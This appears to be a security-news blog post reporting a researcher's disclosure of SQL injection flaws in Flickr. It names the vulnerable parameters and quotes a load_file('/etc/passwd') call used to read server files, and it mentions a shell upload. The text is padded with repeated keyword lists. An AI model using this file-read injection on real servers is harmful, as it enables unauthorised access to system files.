Flickr vulnerable to SQL Injection and Remote Code Execution Flaws

Share it:
Flickr vulnerable to SQL Injection and Remote Code Execution Flaws
Now Security Researcher are on the fire mood, I think. Last week was one of the vulnerable week for the internet. As researcher have found Heartbleed vulnerability that puts almost three-fourth (3/4) of the worlds websites in a vulnerable side. After this Researcher form Detectify have found the critical vulnerability on the Google products that leads to read the 'etc/passwd' and 'etc/host' file of the Google Server.

Now once again another biggest photo sharing site Flickr  (owned by Yahoo.Inc) have suffered from sever vulnerability. A security researcher Ibrahim Raafat from Egypt have found the SQL injection vulnerability on the Flickr site.

Raafat claims that he has found two parameters ( page_id and items ) vulnerable to Blind SQL injection and one (Order_id) vulnerable to direct SQL injection. This vulnerable allow the attacker to read the Flickr database. Further more a successful SQL exploitation can allow attacker to gain database and MYSQL login credentials, by injecting the SQL query.
Flickr hacked, Flickr vulnerable to SQL Injection and Remote Code Execution Flaws, Flickr vulnerable, Flickr SQL injection, Flickr remote code execution, hackers area, security researcher, Flickr  rewards, Flickr  hacked, yahoo hacked, hacking yahoo products, security researcher, bug bounty products, Heat bleed vulnerability

Further more Researcher explains that, SQL injection vulnerability on Flickr allows the attacker to produce its attack to Remote Code Execution on the server and using load_file(“/etc/passwd“) function he was successfully managed to read the content from the sensitive files on the Flickr server, as shown below:
Flickr hacked, Flickr vulnerable to SQL Injection and Remote Code Execution Flaws, Flickr vulnerable, Flickr SQL injection, Flickr remote code execution, hackers area, security researcher, Flickr  rewards, Flickr  hacked, yahoo hacked, hacking yahoo products, security researcher, bug bounty products, Heat bleed vulnerability

Raafat have also shows the Video demonstration that the vulnerability allows to write new files on the server that let him upload a custom 'code execution shell'.
Share it:

Bug Bounty

News

Security

Yahoo

Post A Comment:

0 comments:

Follow by Email